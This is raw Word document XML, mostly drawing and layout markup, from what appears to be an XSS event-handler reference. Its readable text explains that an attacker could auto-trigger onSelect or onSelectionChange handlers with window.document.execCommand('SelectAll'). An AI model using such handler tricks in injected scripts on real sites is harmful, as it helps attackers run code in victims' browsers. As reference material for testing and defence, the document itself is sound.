                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="890,348;21,348;18,348;0,327;0,324;0,187;21,166;890,166;912,187;912,327;894,348;890,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 870" o:spid="_x0000_s1565" type="#_x0000_t202" style="position:absolute;left:1930;top:166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d0PMMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+C/sfwht409QdaleNImMDYSDW7rDjW/Ns&#10;g81L12Rt99+bw2DHj+/3dj/ZVgzUe+NYwWqZgCCunDZcK/go3xYZCB+QNbaOScEvedjvHmZbzLUb&#10;uaDhEmoRQ9jnqKAJocul9FVDFv3SdcSRu7reYoiwr6XucYzhtpVPSZJKi4ZjQ4MdvTRU3S4/VsHh&#10;k4tX8336OhfXwpTlc8Lv6U2p+eN02IAINIV/8Z/7qBVk6zg/nolHQO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d0PM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onSelect()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6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>needs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>some</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>auto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>initialize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>something</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>like: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2179"/>
          <w:tab w:val="left" w:pos="2180"/>
        </w:tabs>
        <w:spacing w:before="131" w:after="74"/>
        <w:ind w:left="2179" w:hanging="1990"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>needs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>some</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>auto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>initialize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>something</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="193" w:lineRule="exact"/>
        <w:ind w:left="470"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:position w:val="-3"/>
          <w:sz w:val="19"/>
          <w:lang w:val="tr-TR" w:eastAsia="tr-TR"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="2273300" cy="123190"/>
                <wp:effectExtent l="6350" t="1905" r="0" b="0"/>
                <wp:docPr id="865" name="Group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3300" cy="123190"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3580" cy="194"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="866" name="Freeform 868"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="7"/>
                            <a:ext cx="3524" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 3502 w 3524"/>
                              <a:gd name="T1" fmla="+- 0 190 7"/>
                              <a:gd name="T2" fmla="*/ 190 h 183"/>
                              <a:gd name="T3" fmla="*/ 21 w 3524"/>
                              <a:gd name="T4" fmla="+- 0 190 7"/>
                              <a:gd name="T5" fmla="*/ 190 h 183"/>
                              <a:gd name="T6" fmla="*/ 18 w 3524"/>
                              <a:gd name="T7" fmla="+- 0 189 7"/>
                              <a:gd name="T8" fmla="*/ 189 h 183"/>
                              <a:gd name="T9" fmla="*/ 0 w 3524"/>
                              <a:gd name="T10" fmla="+- 0 169 7"/>
                              <a:gd name="T11" fmla="*/ 169 h 183"/>
                              <a:gd name="T12" fmla="*/ 0 w 3524"/>
                              <a:gd name="T13" fmla="+- 0 165 7"/>
                              <a:gd name="T14" fmla="*/ 165 h 183"/>
                              <a:gd name="T15" fmla="*/ 0 w 3524"/>
                              <a:gd name="T16" fmla="+- 0 29 7"/>
                              <a:gd name="T17" fmla="*/ 29 h 183"/>
                              <a:gd name="T18" fmla="*/ 21 w 3524"/>
                              <a:gd name="T19" fmla="+- 0 7 7"/>
                              <a:gd name="T20" fmla="*/ 7 h 183"/>
                              <a:gd name="T21" fmla="*/ 3502 w 3524"/>
                              <a:gd name="T22" fmla="+- 0 7 7"/>
                              <a:gd name="T23" fmla="*/ 7 h 183"/>
                              <a:gd name="T24" fmla="*/ 3523 w 3524"/>
                              <a:gd name="T25" fmla="+- 0 29 7"/>
                              <a:gd name="T26" fmla="*/ 29 h 183"/>
                              <a:gd name="T27" fmla="*/ 3523 w 3524"/>
                              <a:gd name="T28" fmla="+- 0 169 7"/>
                              <a:gd name="T29" fmla="*/ 169 h 183"/>
                              <a:gd name="T30" fmla="*/ 3506 w 3524"/>
                              <a:gd name="T31" fmla="+- 0 189 7"/>
                              <a:gd name="T32" fmla="*/ 189 h 183"/>
                              <a:gd name="T33" fmla="*/ 3502 w 3524"/>
                              <a:gd name="T34" fmla="+- 0 190 7"/>
                              <a:gd name="T35" fmla="*/ 190 h 18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524" h="183">
                                <a:moveTo>
                                  <a:pt x="3502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3502" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3523" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3523" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3506" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3502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Text Box 86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58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1"/>
                                <w:ind w:left="3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window.document.execCommand("SelectAll");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66" o:spid="_x0000_s1566" style="width:179pt;height:9.7pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="3580,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">
                <v:shape id="Freeform 868" o:spid="_x0000_s1567" style="position:absolute;top:7;width:3524;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="352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C5gsQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPwWrDMBBE74X+g9hCbo1cQ9TgRgmmUNoekwZ63Vgb&#10;20RaGUu1nXx9FQjkOMzOm53VZnJWDNSH1rOGl3kGgrjypuVaw/7n43kJIkRkg9YzaThTgM368WGF&#10;hfEjb2nYxVokCIcCNTQxdoWUoWrIYZj7jjh5R987jEn2tTQ9jgnurMyzTEmHLaeGBjt6b6g67f5c&#10;esN2r4ffz8GWB3VRXObfLh8XWs+epvINRKQp3o9v6S+jYakUXMckAs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wuYLEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m3502,183l21,183r-3,-1l,162r,-4l,22,21,,3502,r21,22l3523,162r-17,20l3502,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3502,190;21,190;18,189;0,169;0,165;0,29;21,7;3502,7;3523,29;3523,169;3506,189;3502,190" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 867" o:spid="_x0000_s1568" type="#_x0000_t202" style="position:absolute;width:3580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d6lcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKvelGD1Gjq4hYKBSkMR56fM0+&#10;k8Xs25jdavrvu4LgcZiZb5jlureNuFLnjWMF41ECgrh02nCl4Fi8D2cgfEDW2DgmBX/kYb16GSwx&#10;0+7GOV0PoRIRwj5DBXUIbSalL2uy6EeuJY7eyXUWQ5RdJXWHtwi3jZwkSSotGo4LNba0rak8H36t&#10;gs035ztz2f985afcFMU84c/0rNTba79ZgAjUh2f40f7QCmbpFO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F3qV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1"/>
                          <w:ind w:left="30"/>
                          <w:rPr>
                            <w:sz w:val="16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window.document.execCommand("SelectAll");</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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842"/>
          <w:tab w:val="left" w:pos="1843"/>
        </w:tabs>
        <w:ind w:left="1842" w:hanging="1653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6873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262890</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2273300" cy="123190"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="862" name="Group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3300" cy="123190"/>
                          <a:chOff x="1930" y="414"/>
                          <a:chExt cx="3580" cy="194"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="863" name="Freeform 865"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="421"/>
                            <a:ext cx="3524" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5433 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 3524"/>
                              <a:gd name="T2" fmla="+- 0 604 422"/>
                              <a:gd name="T3" fmla="*/ 604 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 3524"/>
                              <a:gd name="T6" fmla="+- 0 604 422"/>
                              <a:gd name="T7" fmla="*/ 604 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 3524"/>
                              <a:gd name="T10" fmla="+- 0 603 422"/>
                              <a:gd name="T11" fmla="*/ 603 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 3524"/>
                              <a:gd name="T14" fmla="+- 0 583 422"/>
                              <a:gd name="T15" fmla="*/ 583 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 3524"/>
                              <a:gd name="T18" fmla="+- 0 579 422"/>
                              <a:gd name="T19" fmla="*/ 579 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 3524"/>
                              <a:gd name="T22" fmla="+- 0 443 422"/>
                              <a:gd name="T23" fmla="*/ 443 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 3524"/>
                              <a:gd name="T26" fmla="+- 0 422 422"/>
                              <a:gd name="T27" fmla="*/ 422 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5433 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 3524"/>
                              <a:gd name="T30" fmla="+- 0 422 422"/>
                              <a:gd name="T31" fmla="*/ 422 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5454 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 3524"/>
                              <a:gd name="T34" fmla="+- 0 443 422"/>
                              <a:gd name="T35" fmla="*/ 443 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5454 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 3524"/>
                              <a:gd name="T38" fmla="+- 0 583 422"/>
                              <a:gd name="T39" fmla="*/ 583 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5436 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 3524"/>
                              <a:gd name="T42" fmla="+- 0 603 422"/>
                              <a:gd name="T43" fmla="*/ 603 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5433 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 3524"/>
                              <a:gd name="T46" fmla="+- 0 604 422"/>
                              <a:gd name="T47" fmla="*/ 60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24" h="183">
                                <a:moveTo>
                                  <a:pt x="350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503" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3524" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3524" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3506" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="350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Text Box 86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414"/>
                            <a:ext cx="358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1"/>
                                <w:ind w:left="3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window.document.execCommand("SelectAll");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3" o:spid="_x0000_s1569" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:20.7pt;width:179pt;height:9.7pt;z-index:-15647744;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,414" coordsize="3580,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">
                <v:shape id="Freeform 865" o:spid="_x0000_s1570" style="position:absolute;left:1930;top:421;width:3524;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="352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caGsQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF7wX/wzKCt7ox0ijRVYJQao+1Ba9jdkyC&#10;u7Mhuyaxv75bKPT4ePO+N2+7H60RPXW+caxgMU9AEJdON1wp+Pp8fV6D8AFZo3FMCh7kYb+bPG0x&#10;127gD+pPoRIRwj5HBXUIbS6lL2uy6OeuJY7e1XUWQ5RdJXWHQ4RbI9MkyaTFhmNDjS0daipvp7uN&#10;b5h2dTm/9aa4ZN8ZF+m7TYcXpWbTsdiACDSG/+O/9FErWGdL+B0TCS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HGhrEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m3503,182l21,182r-3,-1l,161r,-4l,21,21,,3503,r21,21l3524,161r-18,20l3503,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3503,604;21,604;18,603;0,583;0,579;0,443;21,422;3503,422;3524,443;3524,583;3506,603;3503,604" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 864" o:spid="_x0000_s1571" type="#_x0000_t202" style="position:absolute;left:1930;top:414;width:3580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Xk4sUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3urGIkGjq4hUEAqlMR48PrPP&#10;ZDH7NmZXTf99t1DwOMzMN8xi1dtG3KnzxrGC8SgBQVw6bbhScCi2b1MQPiBrbByTgh/ysFoOXhaY&#10;affgnO77UIkIYZ+hgjqENpPSlzVZ9CPXEkfv7DqLIcqukrrDR4TbRr4nSSotGo4LNba0qam87G9W&#10;wfrI+Ye5fp2+83NuimKW8Gd6Uep12K/nIAL14Rn+b++0gmk6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xeTi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1"/>
                          <w:ind w:left="30"/>
                          <w:rPr>
                            <w:sz w:val="16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window.document.execCommand("SelectAll");</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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2262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-287655</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1057275" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="859" name="Group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7275" cy="116205"/>
                          <a:chOff x="1930" y="-453"/>
                          <a:chExt cx="1665" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="860" name="Freeform 862"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="-454"/>
                            <a:ext cx="1665" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3574 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1665"/>
                              <a:gd name="T2" fmla="+- 0 -271 -453"/>
                              <a:gd name="T3" fmla="*/ -271 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1665"/>
                              <a:gd name="T6" fmla="+- 0 -271 -453"/>
                              <a:gd name="T7" fmla="*/ -271 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1665"/>
                              <a:gd name="T10" fmla="+- 0 -272 -453"/>
                              <a:gd name="T11" fmla="*/ -272 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1665"/>
                              <a:gd name="T14" fmla="+- 0 -292 -453"/>
                              <a:gd name="T15" fmla="*/ -292 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1665"/>
                              <a:gd name="T18" fmla="+- 0 -295 -453"/>
                              <a:gd name="T19" fmla="*/ -295 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1665"/>
                              <a:gd name="T22" fmla="+- 0 -432 -453"/>
                              <a:gd name="T23" fmla="*/ -432 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1665"/>
                              <a:gd name="T26" fmla="+- 0 -453 -453"/>
                              <a:gd name="T27" fmla="*/ -453 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3574 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1665"/>
                              <a:gd name="T30" fmla="+- 0 -453 -453"/>
                              <a:gd name="T31" fmla="*/ -453 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3595 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1665"/>
                              <a:gd name="T34" fmla="+- 0 -432 -453"/>
                              <a:gd name="T35" fmla="*/ -432 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3595 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1665"/>
                              <a:gd name="T38" fmla="+- 0 -292 -453"/>
                              <a:gd name="T39" fmla="*/ -292 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3577 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1665"/>
                              <a:gd name="T42" fmla="+- 0 -272 -453"/>
                              <a:gd name="T43" fmla="*/ -272 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3574 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1665"/>
                              <a:gd name="T46" fmla="+- 0 -271 -453"/>
                              <a:gd name="T47" fmla="*/ -27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665" h="183">
                                <a:moveTo>
                                  <a:pt x="164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644" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1665" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1665" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1647" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="164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Text Box 86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-454"/>
                            <a:ext cx="166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onSelectionChange()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0" o:spid="_x0000_s1572" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:-22.65pt;width:83.25pt;height:9.15pt;z-index:-17593856;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,-453" coordsize="166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">
                <v:shape id="Freeform 862" o:spid="_x0000_s1573" style="position:absolute;left:1930;top:-454;width:1665;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="166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nDrsAA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9L/gfwgheRNP1IKUaRXTVBfdiFc9DMzbF&#10;ZlKaqPXfm8OCx8f7ni87W4sHtb5yrOB7nIAgLpyuuFRwPm1HKQgfkDXWjknBizwsF72vOWbaPflI&#10;jzyUIoawz1CBCaHJpPSFIYt+7BriyF1dazFE2JZSt/iM4baWkySZSosVxwaDDa0NFbf8bhUM7WH3&#10;s01fOerh/u92KUzYJJ1Sg363moEI1IWP+N/9qxWk0zg/nolHQC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nDrsAAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rvd25y&#10;ZXYueG1sUEsFBgAAAAAEAAQA9QAAAIUDAAAAAA==&#10;" path="m1644,182l21,182r-3,-1l,161r,-3l,21,21,,1644,r21,21l1665,161r-18,20l1644,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1644,-271;21,-271;18,-272;0,-292;0,-295;0,-432;21,-453;1644,-453;1665,-432;1665,-292;1647,-272;1644,-271" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 861" o:spid="_x0000_s1574" type="#_x0000_t202" style="position:absolute;left:1930;top:-454;width:166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JHesQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXlCb7qxh6DRVUQsCIXSGA8en9ln&#10;sph9G7Orpv++Wyh4HGbmG2a57m0jHtR541jBdJKAIC6dNlwpOBYf4xkIH5A1No5JwQ95WK+GgyVm&#10;2j05p8chVCJC2GeooA6hzaT0ZU0W/cS1xNG7uM5iiLKrpO7wGeG2ke9JkkqLhuNCjS1tayqvh7tV&#10;sDlxvjO3r/N3fslNUcwT/kyvSr2N+s0CRKA+vML/7b1WMEun8Hc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yR3r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onSelectionChange()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2313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848995" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="856" name="Group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8995" cy="116205"/>
                          <a:chOff x="1930" y="154"/>
                          <a:chExt cx="1337" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="857" name="Freeform 859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1337" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3246 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1337"/>
                              <a:gd name="T2" fmla="+- 0 336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1337"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1337"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1337"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1337"/>
